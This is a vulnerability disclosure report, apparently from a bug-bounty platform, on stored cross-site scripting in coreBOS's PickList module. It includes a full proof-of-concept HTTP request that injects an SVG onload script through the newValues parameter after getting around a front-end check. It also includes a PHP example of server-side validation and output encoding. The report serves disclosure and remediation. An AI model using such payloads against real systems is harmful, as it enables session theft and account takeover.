Cross-site Scripting (XSS) - Stored in tsolucio/corebos
Status: Valid
Reported on Apr 20th 2023
Description
There is a taint path that stores the payload in the database. Visit http://127.0.0.1/corebos-master/index.php?action=PickList&module=PickList and click Add Item; the "Add new entries here:" field can be tainted. Although there is a front-end limitation, we can bypass it by modifying the request.
Proof of Concept
The tainted parameter is newValues. The PoC video is at https://drive.google.com/file/d/1W3FXEeGofwAENKszYgrGGKrr_xUas0DQ/view?usp=drivesdk
POST /corebos-master/index.php?action=PickListAjax&module=PickList&mode=add&file=PickListAction&fld_module=Accounts&fieldname=campaignrelstatus&newValues=%5B%22test<svg/onload=alert(/xsssssssssssssssssssss/);>test%22%5D&selectedRoles=%5B%22H2%22%2C%22H3%22%2C%22H4%22%2C%22H5%22%5D HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 70
Referer: http://127.0.0.1/corebos-master/index.php?action=PickList&module=PickList
X-Requested-With: XMLHttpRequest
Origin: http://127.0.0.1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Connection: close
Cookie: ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=3817152672369736; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=966c2fe3f7855e8dd299fe17442437f7; phpbb2mysql_t=a%3A1%3A%7Bi%3A2%3Bi%3A1681955240%3B%7D; cb68ad0d4cc609476d862f5ee438ed70e0=pu80c91imrifdn10elmj65g0g6

__vt5rftk=sid:3b54d1d5d9885d0fc8f064a2039b1cb27d75d068,1681977108&null
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
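The root cause described above is that the "Add new entries" restriction lives only in the browser, so editing the request skips it. The fix pattern is to repeat the check on the server, where a modified request cannot avoid it, and to encode stored values when they are rendered. The PHP below is an added example written for this page; it is not coreBOS code, and the function names, the allowed character set and the rendering context are assumptions.

```php
<?php
// Added example, not coreBOS code: server-side handling for a picklist
// "add entries" request. The same restriction the front end applies is
// enforced here, where editing the request cannot bypass it.
// Function names and the allowed character set are assumptions.

declare(strict_types=1);

/**
 * Decode the newValues parameter (a JSON array of strings, matching the
 * shape used in the report's request) and return only entries that pass
 * the allowlist. Anything else is rejected as a whole.
 */
function parseNewValues(string $raw): array
{
    $decoded = json_decode($raw, true);
    if (!is_array($decoded)) {
        throw new InvalidArgumentException('newValues must be a JSON array');
    }
    $clean = [];
    foreach ($decoded as $entry) {
        if (!is_string($entry)) {
            throw new InvalidArgumentException('newValues entries must be strings');
        }
        if (!isValidPicklistValue($entry)) {
            // Do not echo the rejected value back: reflecting it into an HTML
            // response would reintroduce the same problem.
            throw new InvalidArgumentException('newValues contains a disallowed entry');
        }
        $clean[] = $entry;
    }
    return $clean;
}

/**
 * Allowlist check: letters, digits, space and a few punctuation characters,
 * length 1..100. The policy is an assumption; what matters is that '<', '>',
 * '"' and '&' never pass, so markup can never reach the database.
 */
function isValidPicklistValue(string $value): bool
{
    return (bool) preg_match('/^[\p{L}\p{N} _\-\.\/()]{1,100}$/u', $value);
}

/**
 * Output encoding for the HTML context in which stored picklist values are
 * later shown. Validated values are still encoded on output (defence in depth).
 */
function renderOption(string $value): string
{
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<option value="' . $safe . '">' . $safe . '</option>';
}

// Constructed sample inputs: a benign request body and one carrying markup,
// the shape of input the report describes.
$samples = [
    '["Planned","In Progress"]',
    '["test<svg/onload=alert(1)>test"]',
];

foreach ($samples as $raw) {
    try {
        $values = parseNewValues($raw);
        echo 'accepted: ' . implode(' ', array_map('renderOption', $values)) . PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ' . $e->getMessage() . PHP_EOL;
    }
}
```

Run with `php example.php`: the first body is accepted and rendered as encoded option elements, the second is rejected before anything is stored. Rejecting at parse time, rather than stripping tags, keeps the stored data identical to what the validator approved, which is what makes the later output encoding a second layer rather than the only one.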
We are processing your report and will contact the tsolucio/corebos team within 24 hours. (5 months ago)
We have contacted a member of the tsolucio/corebos team and are waiting to hear back. (5 months ago)